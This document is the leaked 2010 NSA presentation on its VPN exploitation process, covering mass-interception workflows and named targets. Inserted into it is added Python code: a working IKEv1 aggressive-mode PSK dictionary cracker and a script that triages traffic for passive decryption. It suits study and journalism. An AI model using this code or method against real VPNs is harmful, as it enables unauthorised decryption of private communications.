Title: Intro to the VPN Exploitation Process

Release Date: 2014-12-28

Document Date: 2010-09-13

Description: This 13 September 2010 presentation from the NSA’s OTP VPN Exploitation Team explains the work of the division: see the Der Spiegel story Prying Eyes: Inside the NSA’s War on Internet Security, 28 December 2014.

Document: TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

Intro to the VPN Exploitation Process

OTP VPN Exploitation Team

S31176

September 13, 2010

Overview

■ S31176 and the OTP VPN Exploitation Team
■ How can we help you?
■ VPN and Network Encryption Types
■ Birth of the VPN Adventure
■ Sustained Exploitation
■ Exploitation Successes
■ Conclusions

S31176

Branch Name: Custom Thread Development for Network Encryption

Team Name: OTP VPN Exploitation Team

Mission Statement

S31176 provides cryptanalytic support services for many network encryption protocols, including, but not limited to: IPSec, SSL, PPTP, SSH and proprietary protocols. We are the front door of CES for targeted vulnerability assessment and custom interim end-to-end exploitation flows for these protocols. In conjunction with various agency SIGDEV counterparts and target organizations, we engage in discovery to find TOPI targets of interest. By maintaining contact with field sites, TAO, and NCSC, we endeavor to guide and direct development and access through both active and passive means in order to make exploitation possible and enable full prosecution of the target...

Purpose in a Nutshell

■ Act as your one-stop shop for all VPN and network encryption exploitation related issues!
■ Act as a liaison for SIGDEVers and TOPIs to other areas of the VPN community
■ Perform some SIGDEV and target discovery

SID, S > Data Acquisition, S3 > Cryptanalytic Exploitation Services, S31 > Office of Target Pursuit, S311 > Cryptanalytic Exploitation Discovery, S3117 > Custom Thread Development for Network Encryption, S31176

S31176 Branch Members

- Collection
- CMP Intern
- Team Lead, IPSec, SSH
- IPSec
- Branch Chief
- Diversity Tour
- CADP Intern
- PPTP
- BLEAKINQUIRY, SSL

How to Contact us (May be changing soon):

go vpn-xft

Branches within OTP

■ S31171 - PRC, N Korea, SE Asia, Japan
■ S31172 - Iran, Hamas, Iraq, Saudi Arabia
■ S31173 - Africa, Levant, Latin America, India, Pakistan, Afghanistan
■ S31174 - Russia, Counter-Intel, Europe, FTM
■ S31175 - Cross-Target Support Branch
■ S31176 - Custom Thread Development

Exploitation in the OTP Branches

■ Each branch has a VPN representative
■ We inform them about attacks, they inform us about targets
■ If you have a target-specific inquiry, they may be able to help

■ S31171 (Eastern and Southeast Asia)
■ S31172 (Iran, Iraq, Arabian Peninsula)
■ S31173 (Levant, Central Asia, Africa, Latin America)
■ S31174 (Russia, Europe, International Targets)

How can we help you?

■ Provide Exploitation Support
■ Provide VPN vulnerability analysis
■ Engage Network Security Products, TAO, ESO, etc.
■ Convey meaningful feedback to customer
■ Develop sustained exploitation threads when possible
■ Suggest alternative approaches if passive exploitation is unrealistic
■ DECRYPTS, DECRYPTS, DECRYPTS!!!!!!

Additional Services

We can assist with the following:

■ Collection problems
■ Tasking
■ Data flow
■ Plaintext analysis
■ Metadata interpretation
■ Tip-off vulnerable VPN links
■ VPN SIGDEV
■ Target Discovery and Development

How can you help us?

Glad you asked!

■ Familiarize yourself with appropriate search criteria
■ Get a BLEAKINQUIRY account
■ If you find VPN-related data, let us know:
  - The existence of a VPN on a network of interest
  - Configuration/setup information about the VPN

BLEAKINQUIRY

■ Metadata database of potentially exploitable VPNs
■ Data Sources
  - TOYGRIPPE metadata testing
  - XKEYSCORE fingerprints
  - Daily VPN exploitation
■ Let us stress... “P-O-T-E-N-T-I-A-L”
■ Want an account?
  - E-mail or

[Screenshot: BLEAKINQUIRY search page in Mozilla Firefox, with a Search/Submit Query form and a results table of classified entries]

Local IPSec Processing

XKEYSCORE

Type 1: IPSec

■ IPSec: IP Security
■ Complete paired IKE
■ Common UDP ports: 500 and 4500
■ Pre-Shared Key (PSK)
  - Router configuration (good source for PSKs)
■ Encrypted Payload (ESP or AH)
  - Next Protocol 50 or 51
■ XKEYSCORE Queries
  - Full log DNI search
  - AppID/Fingerprints: “vpn/*”, “vpn/esp”, “vpn/isakmp”, “vpn/ikev2”, “vpn/ikev2_content”

Type 2: PPTP

■ PPTP: Point-to-Point Tunneling Protocol
■ Paired collect
  - Next Protocol 47 = PPTP payload
  - TCP Port 1723 = PPTP tunnel set up, no payload
■ One-sided collect, client side
■ XKEYSCORE Queries
  - Full log DNI search
  - Enter your IPs/casn/etc. of interest
  - AppID/Fingerprint: “vpn/pptp_encr*”
■ Share your results with

Type 3: SSL

■ SSL - Secure Sockets Layer
  - Renamed TLS (Transport Layer Security) but still often referred to as SSL
■ Paired collect - Compare IPs and Ports
■ Server Certificates
■ Port Numbers: 443, 465, 989, 990, 992, 993, and 995
■ XKEYSCORE Queries
  - Full log DNI search or use SSL plugin
  - AppID/Fingerprints: “encryption/ssl/*” or “network encryption/ssl/*”

Type 4: SSH

■ SSH - Secure Shell
  - Industry-standard networking protocol for securely logging into other machines via a network.
■ Complete paired traffic
■ Port number 22
■ Potentially recover user names and passwords
■ Useful to TAO to access boxes and gather cryptographic information
■ XKEYSCORE Queries
  - Full log DNI search
  - AppID/Fingerprints: “terminal/ssh/*”

Birth of the VPN Adventure

We receive VPN-related requests from across the Globe:

■ TOPIs
■ SIGDEV Analysts
■ OTP Analysts
■ Cryptologic Centers
■ Field Sites
■ Second Parties

The Many Flavors of Requests

[Diagram: request types surrounding the VPN Exploitation Team]

■ IP Links & Ranges
■ VPN Metadata
■ BLEAKINQUIRY Accounts
■ IPSec, PPTP, SSL, SSH
■ Router Information
■ XKEYSCORE Fingerprints
■ Domain Names
■ Network Protocols
■ Interesting Terms & Names
■ Vulnerability Evaluations

1. Initial Steps

■ VPN Info Found/Question Arises
■ Task Assigned to Team Analyst
■ Gather Background Info About Request

2. Consult Repositories

■ BLEAKINQUIRY - Metadata database of potentially exploitable VPNs
■ TOYGRIPPE - VPN metadata repository
■ PINWALE - Long-term repository for tasked SIGINT collect
■ XKEYSCORE - Processes and databases DNI collect from various field sites
  - Full-take feed (tasked and untasked)
■ VULCANDEATHGRIP - Repository for tasked, full-take VPN collection
■ FOURSCORE - PPTP repository

3. Scripts: IPSec Focus

■ Format downloaded repository files
■ Create intermediate processing files
■ Check for potential vulnerabilities
■ Search for PSKs in CORALREEF
■ Run attacks to recover PSK
■ Decrypt traffic

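The slide above says only "run attacks to recover PSK" and does not name one. As an added example that is not part of the presentation, the Python below implements the best-known public attack of that kind: an offline dictionary attack against IKEv1 aggressive mode. The HASH_R construction is the one from RFC 2409; the capture fields, the demo PSK, the wordlist and the `make_demo_capture` helper (a stand-in for a real responder, producing deterministic values so the run is repeatable) are all constructed here.

```python
"""Offline dictionary attack on an IKEv1 aggressive-mode pre-shared key.

RFC 2409 (sections 5.1 and 5.4) defines, for PSK authentication:
    SKEYID = prf(PSK, Ni_b | Nr_b)
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
In aggressive mode HASH_R travels unencrypted, so a passive collector has
every input except the PSK and can test candidates offline. (Main mode
encrypts HASH_R, so the same capture gives nothing to attack there.)
"""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional


@dataclass(frozen=True)
class AggressiveModeCapture:
    """Fields carved out of the first two aggressive-mode packets."""
    ni_b: bytes    # initiator nonce payload body
    nr_b: bytes    # responder nonce payload body
    g_xi: bytes    # initiator Diffie-Hellman public value
    g_xr: bytes    # responder Diffie-Hellman public value
    cky_i: bytes   # initiator cookie from the ISAKMP header (8 bytes)
    cky_r: bytes   # responder cookie (8 bytes)
    sai_b: bytes   # initiator SA payload body, generic header stripped
    idir_b: bytes  # responder ID payload body, generic header stripped
    hash_r: bytes  # HASH_R as sent in the clear by the responder
    prf: str       # negotiated PRF: "sha1" (HMAC-SHA1) or "md5" (HMAC-MD5)


def hash_r_for_psk(cap: AggressiveModeCapture, psk: bytes) -> bytes:
    """Recompute HASH_R exactly as the responder does for a candidate PSK."""
    skeyid = hmac.new(psk, cap.ni_b + cap.nr_b, cap.prf).digest()
    msg = cap.g_xr + cap.g_xi + cap.cky_r + cap.cky_i + cap.sai_b + cap.idir_b
    return hmac.new(skeyid, msg, cap.prf).digest()


def crack_psk(cap: AggressiveModeCapture, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose HASH_R matches the captured one, else None."""
    for cand in wordlist:
        if hmac.compare_digest(hash_r_for_psk(cap, cand.encode()), cap.hash_r):
            return cand
    return None


def _fixed(tag: bytes, n: int) -> bytes:
    """Deterministic stand-in for random on-the-wire values (demo only)."""
    return hashlib.shake_256(tag).digest(n)


def make_demo_capture(psk: bytes, prf: str = "sha1") -> AggressiveModeCapture:
    """Simulate the responder of an aggressive-mode exchange that knows `psk`
    and return what an observer on the path would record. The DH values are
    opaque byte strings here: the attack only ever needs the public values."""
    fields = dict(
        ni_b=_fixed(b"ni", 16), nr_b=_fixed(b"nr", 16),
        g_xi=_fixed(b"gxi", 128), g_xr=_fixed(b"gxr", 128),   # 1024-bit group sizes
        cky_i=_fixed(b"ci", 8), cky_r=_fixed(b"cr", 8),
        sai_b=_fixed(b"sa", 40),
        idir_b=bytes([1, 0, 0, 0]) + bytes([203, 0, 113, 5]),  # ID_IPV4_ADDR 203.0.113.5
        prf=prf,
    )
    unauth = AggressiveModeCapture(hash_r=b"", **fields)
    return AggressiveModeCapture(hash_r=hash_r_for_psk(unauth, psk), **fields)


if __name__ == "__main__":
    capture = make_demo_capture(b"cisco123")
    print(crack_psk(capture, ["admin", "vpn", "cisco123", "secret"]))
```

ike-scan's psk-crack and hashcat (modes 5300 and 5400) run the same comparison against real captures at speed. One caveat worth keeping in mind when reading the rest of the deck: the PSK yields SKEYID, but the keys that protect ESP are derived from SKEYID together with the Diffie-Hellman shared secret g^xy, so a purely passive decryptor needs that secret as well (from an endpoint's state or by solving the DH exchange); the PSK alone is sufficient only for an active peer impersonation.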

4. Communicate Results

■ Can we decrypt the VPN traffic?
  - If the answer is “No” then explain how to turn it into a “YES!”
  - If the answer is “YES!” then...

Happy Dance!!

YES! We Have Decrypt!

■ Notify customer of success
■ Send decrypt through post-processing and deliver to TOPI
■ Have TOPI determine the priority level of the resulting plain text
■ Get IPs on sustained collect
■ Set up and transition sustained decryption process to OTP VPN Branch Rep

Turn that Frown Upside Down!

From “No” to “YES!”

■ Depends on why we couldn’t decrypt it
■ Find Pre-Shared Key
■ Locate complete paired collect
■ Locate both IKE and ESP traffic
■ Have collection sites do surveys for the IPs
■ Find better quality collect with rich metadata

Contact Our Friends for Help

■ Network Security Products
  - Develop decryption algorithms
■ Tailored Access Operations
  - Computer Network Exploitation to create access points
■ Collection Sites
  - Perform surveys for the IPs of interest

More Friends

■ NSA/CSS Commercial Solutions Center
  - Manage industrial relationships
■ SIGDEV
  - Develops tools and methods to help you find the traffic you desire
■ OTP VPN Representatives
  - Assist in locating traffic of interest
■ TOPI
  - Target knowledge

Sustained Exploitation

■ Develop sustained exploitation thread AFTER the TOPI confirms the decrypts are interesting
■ TOPI must task IP in CADENCE
  - Task Port and IP
  - UTT does not have boolean logic
  - Categories
    IPSec: 6640 (protocols) and 6648 (ports)
    PPTP: 6648 (ports)
    SSL: 6647 (ports)
■ Get the crypt system title
■ Work with the OTP VPN Regional Branch representative

Establish the Data Flow

■ Establish the correct corporate data flow
  - CES data flow guru
■ Make sure the correct routing tags and categories are appended to the data
■ Direct tasked traffic to correct data repository
  - PINWALE
  - VULCANDEATHGRIP - IPSec
  - VULCANMINDMELD - SSL
  - FOURSCORE - PPTP
■ Try to avoid relying on XKS workflows due to legal and logistical issues
  - XKEYSCORE - SSH using XKS workflows directed to a file directory

Data Flow Integrity

■ Evaluate data integrity, quality, & quantity
■ Different collectors produce different metadata formats
■ Need rich metadata
■ Need all the pieces (IKE and ESP for IPSec)
■ Ensure that the data is not garbled and headers attached appropriately
■ Check that the data volume is what is expected

Collection Sites

■ Contact Collection Sites if there are data issues
  - Malformed headers
  - Missing metadata
  - Missing payload
  - Garbled data
  - Low volume
  - Single-sided traffic
■ Collection sites sometimes only collect one side of the VPN traffic
■ Need to collaborate with both sites

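As an added example that is not taken from the presentation, the Python below applies the protocol and port fingerprints from the Type 1 to Type 4 slides to flow records, then runs the completeness checks from the Data Flow Integrity and Collection Sites slides (paired collect in both directions, and both IKE and ESP for the same endpoint pair) so that whatever is missing can be stated precisely in the request back to the collection site. The `Flow` record layout, the fingerprint names not printed on the slides (`vpn/natt`, `vpn/pptp_control`, `vpn/ah`), and every address and packet count in `SAMPLE` are constructed for the example.

```python
"""Triage of flow metadata for the prerequisites of passive VPN exploitation."""
from collections import Counter, defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple

TCP, UDP, GRE, ESP, AH = 6, 17, 47, 50, 51       # IP protocol numbers
SSL_PORTS = {443, 465, 989, 990, 992, 993, 995}  # ports listed on the SSL slide


@dataclass(frozen=True)
class Flow:
    """One unidirectional flow record (constructed format, not a collector's)."""
    src: str
    dst: str
    proto: int    # IP protocol number
    sport: int    # 0 when the protocol has no ports (ESP, AH, GRE)
    dport: int
    packets: int


def fingerprint(f: Flow) -> str:
    """Map a flow to the fingerprint family the type slides use for it."""
    ports = {f.sport, f.dport}
    if f.proto == ESP:
        return "vpn/esp"
    if f.proto == AH:
        return "vpn/ah"
    if f.proto == GRE:
        return "vpn/pptp_encr"       # next protocol 47 carries the PPTP payload
    if f.proto == UDP and 500 in ports:
        return "vpn/isakmp"
    if f.proto == UDP and 4500 in ports:
        # NAT-T: IKE and UDP-encapsulated ESP share 4500; only the 4-byte
        # non-ESP marker in the payload tells them apart, which metadata lacks.
        return "vpn/natt"
    if f.proto == TCP and 1723 in ports:
        return "vpn/pptp_control"    # tunnel setup only, no payload
    if f.proto == TCP and 22 in ports:
        return "terminal/ssh"
    if f.proto == TCP and ports & SSL_PORTS:
        return "encryption/ssl"
    return "unknown"


def summarize(flows: Iterable[Flow]) -> Counter:
    """Packet volume per fingerprint family (the quick check that volume is as expected)."""
    c: Counter = Counter()
    for f in flows:
        c[fingerprint(f)] += f.packets
    return c


def assess_ipsec(flows: Iterable[Flow]) -> Dict[Tuple[str, str], dict]:
    """Per unordered endpoint pair: are IKE and ESP both present and both
    directions collected? `missing` lists what to ask the collection site for."""
    seen = defaultdict(lambda: {"ike": set(), "esp": set(), "natt": set()})
    kinds = {"vpn/isakmp": "ike", "vpn/esp": "esp", "vpn/natt": "natt"}
    for f in flows:
        kind = kinds.get(fingerprint(f))
        if kind is None:
            continue
        pair = tuple(sorted((f.src, f.dst)))
        seen[pair][kind].add((f.src, f.dst))    # direction actually observed
    report = {}
    for (a, b), s in seen.items():
        both = {(a, b), (b, a)}
        missing: List[str] = []
        if not s["ike"]:
            missing.append("no IKE: SA parameters unknown, PSK recovery impossible")
        elif s["ike"] != both:
            missing.append("IKE single-sided: need paired collect from both sites")
        if not s["esp"]:
            missing.append("no ESP: nothing to decrypt")
        elif s["esp"] != both:
            missing.append("ESP single-sided: only one direction would decrypt")
        report[(a, b)] = {"complete": not missing, "missing": missing,
                          "natt": bool(s["natt"])}
    return report


# Constructed sample: one complete pair, one ESP-only single-sided pair, one
# IKE-only pair, plus PPTP and SSH flows that are classified but not assessed.
SAMPLE = [
    Flow("10.1.1.1", "203.0.113.5", UDP, 500, 500, 12),
    Flow("203.0.113.5", "10.1.1.1", UDP, 500, 500, 12),
    Flow("10.1.1.1", "203.0.113.5", ESP, 0, 0, 4800),
    Flow("203.0.113.5", "10.1.1.1", ESP, 0, 0, 5100),
    Flow("10.2.2.2", "198.51.100.9", ESP, 0, 0, 900),
    Flow("10.3.3.3", "192.0.2.7", UDP, 500, 500, 8),
    Flow("192.0.2.7", "10.3.3.3", UDP, 500, 500, 8),
    Flow("10.4.4.4", "192.0.2.20", TCP, 40000, 1723, 30),
    Flow("10.4.4.4", "192.0.2.20", GRE, 0, 0, 2000),
    Flow("10.5.5.5", "192.0.2.30", TCP, 40001, 22, 60),
]

if __name__ == "__main__":
    print(dict(summarize(SAMPLE)))
    for pair, verdict in assess_ipsec(SAMPLE).items():
        print(pair, verdict)
```

The `missing` strings are deliberately phrased as the request to send back: a pair with no IKE at all is a different problem (wrong link tapped, or the SA was set up before collection started) from a pair where IKE is present in only one direction (two sites each holding half of the exchange), and the collection site needs to know which.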

Decrypt Processing

■ Decrypt the VPN traffic
■ Create SRI files for decrypts
■ Send the decrypt and SRI files to TURTLEPOWER (IPSec, PPTP) or CAPRI OS (SSL, SSH) for post-processing
  - Decryption of payload
  - Decompression
  - Unrar files
■ Route to appropriate data repository according to the crypt system title and type of decrypt (text, voice, etc.)

Decrypt Repositories

■ PINWALE
  - Tasked IPSec, PPTP, and SSL
  - Must be placed in the correct partition according to classification (REL FVEY, NOFORN, FISA)
■ XKEYSCORE
  - SSH - often have router configurations and user credentials which are easier to view in XKS than PINWALE
  - Still developing the process

TOPI Evaluation

■ Analyst locates the decrypts in PINWALE and/or XKEYSCORE
■ Viewing the decrypts
  - PINWALE
  - XKEYSCORE
  - AGILITY
  - DNIPRESENTER
■ Contact TURTLEPOWER or CAPRI OS if there are file rendering issues
■ Also try the Unidentified Protocols team in S31122 for help identifying unknown protocols

Thread Monitoring

■ Responsibility for monitoring these exploitation threads is transferred to the OTP VPN Regional Branch representative after the thread is established and stabilized
■ Troubleshoots decryption and collection issues
■ Set up a cron job to run the decryptor every day
■ Hopefully the TOPI continues to identify and report mission-critical intelligence from these decrypts

Success 1: IPSec

■ Follow-the-Money and TAO Targets
■ TOPI (S2C22) has had a close relationship with TAO for quite some time
■ FTM Target 1
  - Not susceptible to any of NSP’s implants
  - got the configuration files which provided us the PSKs to enable passive exploitation

Success 1: IPSec

■ FTM Target 2
  - TAO got on the router through which banking traffic of interest flows
  - NSP had an implant which allows passive exploitation with just ESP
  - Successful exploitation for the past two years

Success 2: PPTP

■ Airlines
  - Iran Air, IRTAA
  - Royal Jordanian Air, JOTAA
  - Transaero Airlines, RUCAC
■ Telecommunications
  - Mir Telematiki (pending system title)
  - Afghani Wimax (pending system title)
■ Government
  - Mexican Diplomatic, MXDBB
  - Pakistani General Intelligence, PKRAQ
  - Turkish Diplomatic, TUDAT
  - Afghanistan Government, AFYAD

Success 2: PPTP

■ Banking and Financial
  - Zaad Financial
    Ewallet transactions of a principal financial node for Somali terrorist activity
    Follow-the-Money customer
  - Kabul Bank
  - BNI Banking, Indonesia
    Formed and owned by the Indonesian government
    Banking transactions over “Flexy,” Telkom Indonesia’s fixed wireless network
■ Other
  - IRGC cyber attacker
  - Nigerian power company’s internal network

Reminders

■ If it’s not exploitable now, that doesn’t mean it won’t be later
■ We collaborate and communicate with our friends to produce decrypts
■ Traffic must be both good quality and the correct type